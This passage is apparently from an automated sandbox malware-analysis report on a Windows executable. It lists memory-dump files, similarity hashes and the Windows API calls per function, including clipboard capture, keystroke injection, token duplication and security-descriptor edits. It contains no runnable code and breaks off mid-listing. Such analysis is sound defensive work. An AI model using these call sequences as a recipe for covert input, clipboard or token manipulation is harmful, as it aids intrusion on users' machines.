        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CreateThread
        • String ID:
        • API String ID: 2422867632-0
        • Opcode ID: 4a419ccad9ad200cf9730f73615f8aab2bb3dde0df7f88f24acd8684fc0b82ba
        • Instruction ID: 53e5d9805bd372a2ae7afb35cd4f3de55492cf07680b9eacff202bb64173fa99
        • Opcode Fuzzy Hash: 4a419ccad9ad200cf9730f73615f8aab2bb3dde0df7f88f24acd8684fc0b82ba
        • Instruction Fuzzy Hash: 2ED05EB2422315BFAB2C9B60DD4ACA7769CEA05B12340162EB806A1501F5B0FD00CAA4
        APIs
        • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 0024DF40
          • Part of subcall function 001E6B57: _wcslen.LIBCMT ref: 001E6B6A
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FolderPath_wcslen
        • String ID:
        • API String ID: 2987691875-0
        • Opcode ID: 0ffb122c4b6169ff0fc75fb2e79f3f20493cff1611d7774a81d67821f6162ab8
        • Instruction ID: 54ef76b0d13e25a534301bd9be493e5540e3e939f0119317b4f9b40538601f2f
        • Opcode Fuzzy Hash: 0ffb122c4b6169ff0fc75fb2e79f3f20493cff1611d7774a81d67821f6162ab8
        • Instruction Fuzzy Hash: 62D05EA2A002282BDF60A6759C0DDFB3AADD740250F0006A0786DD3152EA20DD8486B0
        APIs
        • CreateFileW.KERNELBASE(00000000,00000000,?,00220704,?,?,00000000,?,00220704,00000000,0000000C), ref: 002203B7
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: 1682e831a282ca9d385bb55ee2cab652053cc5903f1c05024e05b0bb9f08e138
        • Instruction ID: a783dccc88c8aa8170f7a87de7df11d7f1582616b502fa831e3b04a5b01bd33b
        • Opcode Fuzzy Hash: 1682e831a282ca9d385bb55ee2cab652053cc5903f1c05024e05b0bb9f08e138
        • Instruction Fuzzy Hash: 8FD06C3204010DBBDF028F85ED06EDA3BAAFB48714F114050BE1C56020C732E861AB90
        APIs
        • GetFileAttributesW.KERNELBASE(?,0024CF95), ref: 0024E19A
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: AttributesFile
        • String ID:
        • API String ID: 3188754299-0
        • Opcode ID: d15cd9abe8dd9e4fe432f84b91feffe7e70168eb7d54abb1f715660ebb99e72b
        • Instruction ID: 005604473e79d9b2d84f131e90ecd85e49643d247b08052e634d1159c0f46a80
        • Opcode Fuzzy Hash: d15cd9abe8dd9e4fe432f84b91feffe7e70168eb7d54abb1f715660ebb99e72b
        • Instruction Fuzzy Hash: 71B0923406064105BD2C0E38290C1A9330079C33B57E91BC4E87D850E683398CABA520
        APIs
        • SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 001E1CBC
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: InfoParametersSystem
        • String ID:
        • API String ID: 3098949447-0
        • Opcode ID: 3b98544524a6c12c318c1be86d53a37f5db569dd1fb9dc44581f6d7525607894
        • Instruction ID: c9d7b2e16a8fe44b8e77dd067b13e07ed6fd2e08d316d7ef7f706b52fe55455e
        • Opcode Fuzzy Hash: 3b98544524a6c12c318c1be86d53a37f5db569dd1fb9dc44581f6d7525607894
        • Instruction Fuzzy Hash: E6C09236280304EFF2288B90BC5EF1077A4E348B00F988101F70DB95E3D3A22860EB50
        APIs
          • Part of subcall function 0024D3A9: FindFirstFileW.KERNELBASE(?,?), ref: 0024D420
          • Part of subcall function 0024D3A9: DeleteFileW.KERNELBASE(?,?,?,?), ref: 0024D470
          • Part of subcall function 0024D3A9: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0024D481
          • Part of subcall function 0024D3A9: FindClose.KERNEL32(00000000), ref: 0024D498
        • GetLastError.KERNEL32 ref: 00255C29
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: FileFind$CloseDeleteErrorFirstLastNext
        • String ID:
        • API String ID: 2191629493-0
        • Opcode ID: d4313bc6bd0ecc9653e00af62feb260277f95592e32420bd167be6542022f288
        • Instruction ID: d6ae58553b3c6789e817632eb16c7730bb98d1c2872c49a5e77ee69b79655f01
        • Opcode Fuzzy Hash: d4313bc6bd0ecc9653e00af62feb260277f95592e32420bd167be6542022f288
        • Instruction Fuzzy Hash: 73F0A032300A108FDB14EF99E854B6EB7E9AF98361F04845DF90A9B352CB70FC018B94
        APIs
          • Part of subcall function 001F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 001F9BB2
        • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0027961A
        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0027965B
        • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0027969F
        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002796C9
        • SendMessageW.USER32 ref: 002796F2
        • GetKeyState.USER32(00000011), ref: 0027978B
        • GetKeyState.USER32(00000009), ref: 00279798
        • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 002797AE
        • GetKeyState.USER32(00000010), ref: 002797B8
        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 002797E9
        • SendMessageW.USER32 ref: 00279810
        • SendMessageW.USER32(?,00001030,?,00277E95), ref: 00279918
        • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0027992E
        • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 00279941
        • SetCapture.USER32(?), ref: 0027994A
        • ClientToScreen.USER32(?,?), ref: 002799AF
        • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 002799BC
        • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 002799D6
        • ReleaseCapture.USER32 ref: 002799E1
        • GetCursorPos.USER32(?), ref: 00279A19
        • ScreenToClient.USER32(?,?), ref: 00279A26
        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00279A80
        • SendMessageW.USER32 ref: 00279AAE
        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00279AEB
        • SendMessageW.USER32 ref: 00279B1A
        • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 00279B3B
        • SendMessageW.USER32(?,0000110B,00000009,?), ref: 00279B4A
        • GetCursorPos.USER32(?), ref: 00279B68
        • ScreenToClient.USER32(?,?), ref: 00279B75
        • GetParent.USER32(?), ref: 00279B93
        • SendMessageW.USER32(?,00001012,00000000,?), ref: 00279BFA
        • SendMessageW.USER32 ref: 00279C2B
        • ClientToScreen.USER32(?,?), ref: 00279C84
        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 00279CB4
        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00279CDE
        • SendMessageW.USER32 ref: 00279D01
        • ClientToScreen.USER32(?,?), ref: 00279D4E
        • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 00279D82
          • Part of subcall function 001F9944: GetWindowLongW.USER32(?,000000EB), ref: 001F9952
        • GetWindowLongW.USER32(?,000000F0), ref: 00279E05
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
        • String ID: @GUI_DRAGID$F$p#+
        • API String ID: 3429851547-1203076301
        • Opcode ID: 1fa491c257f574a8e2086b0360af16acc68695adf2927c3500ac27c2ae0a6132
        • Instruction ID: d9b4023cba9d6498b5adf8c072b130fd08e52ae7728877c83609c7873fd001b4
        • Opcode Fuzzy Hash: 1fa491c257f574a8e2086b0360af16acc68695adf2927c3500ac27c2ae0a6132
        • Instruction Fuzzy Hash: 44428F70614342AFD724CF24DC88AAABBE9FF49310F10861DF699872A1D771E8A0CF51
        APIs
        • SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 002748F3
        • SendMessageW.USER32(00000000,00000188,00000000,00000000), ref: 00274908
        • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00274927
        • SendMessageW.USER32(?,00000148,00000000,00000000), ref: 0027494B
        • SendMessageW.USER32(00000000,00000147,00000000,00000000), ref: 0027495C
        • SendMessageW.USER32(00000000,00000149,00000000,00000000), ref: 0027497B
        • SendMessageW.USER32(00000000,0000130B,00000000,00000000), ref: 002749AE
        • SendMessageW.USER32(00000000,0000133C,00000000,?), ref: 002749D4
        • SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 00274A0F
        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00274A56
        • SendMessageW.USER32(00000000,0000113E,00000000,00000004), ref: 00274A7E
        • IsMenu.USER32(?), ref: 00274A97
        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00274AF2
        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00274B20
        • GetWindowLongW.USER32(?,000000F0), ref: 00274B94
        • SendMessageW.USER32(?,0000113E,00000000,00000008), ref: 00274BE3
        • SendMessageW.USER32(00000000,00001001,00000000,?), ref: 00274C82
        • wsprintfW.USER32 ref: 00274CAE
        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00274CC9
        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00274CF1
        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00274D13
        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00274D33
        • GetWindowTextW.USER32(?,00000000,00000001), ref: 00274D5A
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: MessageSend$MenuWindow$InfoItemText$Longwsprintf
        • String ID: %d/%02d/%02d
        • API String ID: 4054740463-328681919
        • Opcode ID: cf4a8fc86e8fe6349e697a6d73cdd4e09d57cf691813a8eda5bad3e3642f2e71
        • Instruction ID: 3a96a6cbb7804226148354b7979628792869e6ec387cc08338912ccbc90f5137
        • Opcode Fuzzy Hash: cf4a8fc86e8fe6349e697a6d73cdd4e09d57cf691813a8eda5bad3e3642f2e71
        • Instruction Fuzzy Hash: CF120171510209ABEB25AF34DC49FAE7BF8EF85310F10812DF51AEA2E1D7B49951CB50
        APIs
        • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 001FF998
        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0023F474
        • IsIconic.USER32(00000000), ref: 0023F47D
        • ShowWindow.USER32(00000000,00000009), ref: 0023F48A
        • SetForegroundWindow.USER32(00000000), ref: 0023F494
        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0023F4AA
        • GetCurrentThreadId.KERNEL32 ref: 0023F4B1
        • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0023F4BD
        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0023F4CE
        • AttachThreadInput.USER32(?,00000000,00000001), ref: 0023F4D6
        • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0023F4DE
        • SetForegroundWindow.USER32(00000000), ref: 0023F4E1
        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F4F6
        • keybd_event.USER32(00000012,00000000), ref: 0023F501
        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F50B
        • keybd_event.USER32(00000012,00000000), ref: 0023F510
        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F519
        • keybd_event.USER32(00000012,00000000), ref: 0023F51E
        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0023F528
        • keybd_event.USER32(00000012,00000000), ref: 0023F52D
        • SetForegroundWindow.USER32(00000000), ref: 0023F530
        • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0023F557
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
        • String ID: Shell_TrayWnd
        • API String ID: 4125248594-2988720461
        • Opcode ID: 069ee3d841ef615de66cb4ff409a2d439691f4bfb885588e55eb03424da74674
        • Instruction ID: 15a26d74cb79bc74ec26e50af471c95b7cf9aed8e772cc69db92abfc7e015830
        • Opcode Fuzzy Hash: 069ee3d841ef615de66cb4ff409a2d439691f4bfb885588e55eb03424da74674
        • Instruction Fuzzy Hash: AD3153B1E502187BEB206FB56D4AFBF7E6CEB44B50F200069F604F61D1C6B15D50AA60
        APIs
          • Part of subcall function 002416C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0024170D
          • Part of subcall function 002416C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0024173A
          • Part of subcall function 002416C3: GetLastError.KERNEL32 ref: 0024174A
        • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00241286
        • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 002412A8
        • CloseHandle.KERNEL32(?), ref: 002412B9
        • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 002412D1
        • GetProcessWindowStation.USER32 ref: 002412EA
        • SetProcessWindowStation.USER32(00000000), ref: 002412F4
        • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00241310
          • Part of subcall function 002410BF: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002411FC), ref: 002410D4
          • Part of subcall function 002410BF: CloseHandle.KERNEL32(?,?,002411FC), ref: 002410E9
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
        • String ID: $default$winsta0$Z*
        • API String ID: 22674027-678551114
        • Opcode ID: d9ae1b8bf81a20733b6933021c211967924cb4f6a7340e2d1f206f68c03627dc
        • Instruction ID: c26a8ed2b6318a4357a17df5c85cbbf253b6be2300f0afd663b78349fb41b41f
        • Opcode Fuzzy Hash: d9ae1b8bf81a20733b6933021c211967924cb4f6a7340e2d1f206f68c03627dc
        • Instruction Fuzzy Hash: 4E81AD7191020AAFDF299FA4DC49FEE7BB9EF04704F144129FA14B61A1D77099A4CF60
        APIs
          • Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00241114
          • Part of subcall function 002410F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241120
          • Part of subcall function 002410F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 0024112F
          • Part of subcall function 002410F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00240B9B,?,?,?), ref: 00241136
          • Part of subcall function 002410F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0024114D
        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00240BCC
        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00240C00
        • GetLengthSid.ADVAPI32(?), ref: 00240C17
        • GetAce.ADVAPI32(?,00000000,?), ref: 00240C51
        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00240C6D
        • GetLengthSid.ADVAPI32(?), ref: 00240C84
        • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00240C8C
        • HeapAlloc.KERNEL32(00000000), ref: 00240C93
        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00240CB4
        • CopySid.ADVAPI32(00000000), ref: 00240CBB
        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00240CEA
        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00240D0C
        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00240D1E
        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240D45
        • HeapFree.KERNEL32(00000000), ref: 00240D4C
        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240D55
        • HeapFree.KERNEL32(00000000), ref: 00240D5C
        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00240D65
        • HeapFree.KERNEL32(00000000), ref: 00240D6C
        • GetProcessHeap.KERNEL32(00000000,?), ref: 00240D78
        • HeapFree.KERNEL32(00000000), ref: 00240D7F
          • Part of subcall function 00241193: GetProcessHeap.KERNEL32(00000008,00240BB1,?,00000000,?,00240BB1,?), ref: 002411A1
          • Part of subcall function 00241193: HeapAlloc.KERNEL32(00000000,?,00000000,?,00240BB1,?), ref: 002411A8
          • Part of subcall function 00241193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00240BB1,?), ref: 002411B7
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
        • String ID:
        • API String ID: 4175595110-0
        • Opcode ID: 4dcc46065b84e416346a964bbbfddcc72205ecb96de3451d1b214cd112581d0e
        • Instruction ID: a18793054a63682b7a84ce92746c4de701ea01cd9d90990b371f1f3277709c97
        • Opcode Fuzzy Hash: 4dcc46065b84e416346a964bbbfddcc72205ecb96de3451d1b214cd112581d0e
        • Instruction Fuzzy Hash: ED71607191020AEBDF14DFE4DC88FAEBBB8FF04310F144529EA19A6151D771A995CBA0
        APIs
        • OpenClipboard.USER32(0027CC08), ref: 0025EB29
        • IsClipboardFormatAvailable.USER32(0000000D), ref: 0025EB37
        • GetClipboardData.USER32(0000000D), ref: 0025EB43
        • CloseClipboard.USER32 ref: 0025EB4F
        • GlobalLock.KERNEL32(00000000), ref: 0025EB87
        • CloseClipboard.USER32 ref: 0025EB91
        • GlobalUnlock.KERNEL32(00000000), ref: 0025EBBC
        • IsClipboardFormatAvailable.USER32(00000001), ref: 0025EBC9
        • GetClipboardData.USER32(00000001), ref: 0025EBD1
        • GlobalLock.KERNEL32(00000000), ref: 0025EBE2
        • GlobalUnlock.KERNEL32(00000000), ref: 0025EC22
        • IsClipboardFormatAvailable.USER32(0000000F), ref: 0025EC38
        • GetClipboardData.USER32(0000000F), ref: 0025EC44
        • GlobalLock.KERNEL32(00000000), ref: 0025EC55
        • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0025EC77
        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0025EC94
        • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0025ECD2
        • GlobalUnlock.KERNEL32(00000000), ref: 0025ECF3
        • CountClipboardFormats.USER32 ref: 0025ED14
        • CloseClipboard.USER32 ref: 0025ED59
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
        • String ID:
        • API String ID: 420908878-0
        • Opcode ID: 05b5cb1464ce9265ae9486af442bc36997b181a149d01824eca8e0e032dab549
        • Instruction ID: e5362aedd431de337520045f7f0db9a0926884ece5307395f92e892be9b05c34
        • Opcode Fuzzy Hash: 05b5cb1464ce9265ae9486af442bc36997b181a149d01824eca8e0e032dab549
        • Instruction Fuzzy Hash: C06104702143029FD704EF31D888F2A77A8BF94705F25451DF85A872A2CB70DE49CB66
        APIs
        • FindFirstFileW.KERNEL32(?,?), ref: 002569BE
        • FindClose.KERNEL32(00000000), ref: 00256A12
        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00256A4E
        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00256A75
          • Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD
        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00256AB2
        • FileTimeToSystemTime.KERNEL32(?,?), ref: 00256ADF
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true
        • Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_1e0000_file.jbxd
        Similarity
        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
        • API String ID: 3830820486-3289030164
        • Opcode ID: b475fee7dfd05a95710fb35fab5e9460abcd6139febd03837a6fed89be9174b0
        • Instruction ID: caa794245eb28771b72fe07dd9c1e3226b72596a72e5b6b5e8df44779529a35f
        • Opcode Fuzzy Hash: b475fee7dfd05a95710fb35fab5e9460abcd6139febd03837a6fed89be9174b0
        • Instruction Fuzzy Hash: B2D16F72508340AEC310EFA5D885EAFB7ECAFA8704F44491DF985D7191EB74DA48CB62
        APIs
        • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 00259663
        • GetFileAttributesW.KERNEL32(?), ref: 002596A1
        • SetFileAttributesW.KERNEL32(?,?), ref: 002596BB
